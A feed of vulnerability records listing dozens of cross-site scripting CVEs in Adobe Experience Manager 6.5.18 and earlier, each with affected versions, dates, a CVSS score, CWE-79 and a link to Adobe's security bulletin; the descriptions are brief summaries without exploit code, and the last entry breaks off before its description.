Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48486

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48486
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48487

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48487
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48488

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48488
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48489

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48489
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48490

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48490
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48491

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:13

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48491
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48492

First published on : 15-12-2023 11:15:20
Last modified on : 18-12-2023 19:32:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48492
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48493

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48493
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48494

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48494
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48495

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:43

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48495
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48496

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:17:49

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48496
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48497

First published on : 15-12-2023 11:15:21
Last modified on : 18-12-2023 20:18:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48497
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48498

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:12

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48498
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48499

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:19

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48499
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48500

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48500
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48501

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:18:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48501
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48502

First published on : 15-12-2023 11:15:22
Last modified on : 18-12-2023 20:19:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48502
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48503

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:18:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48503
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48504

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:02

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48504
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48505

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48505
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48506

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:19:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48506
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48507

First published on : 15-12-2023 11:15:23
Last modified on : 18-12-2023 20:23:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48507
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48508

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:23:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48508
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48509

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48509
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48510

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48510
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48511

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48511
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48512

First published on : 15-12-2023 11:15:24
Last modified on : 18-12-2023 20:24:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48512
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48513

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48513
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48514

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48514
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48515

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48515
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48516

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48516
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48517

First published on : 15-12-2023 11:15:25
Last modified on : 18-12-2023 20:25:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48517
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48518

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:25:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48518
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48519

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48519
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48520

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48520
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48521

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48521
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48522

First published on : 15-12-2023 11:15:26
Last modified on : 18-12-2023 20:26:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48522
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48523

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:26:40

Description :
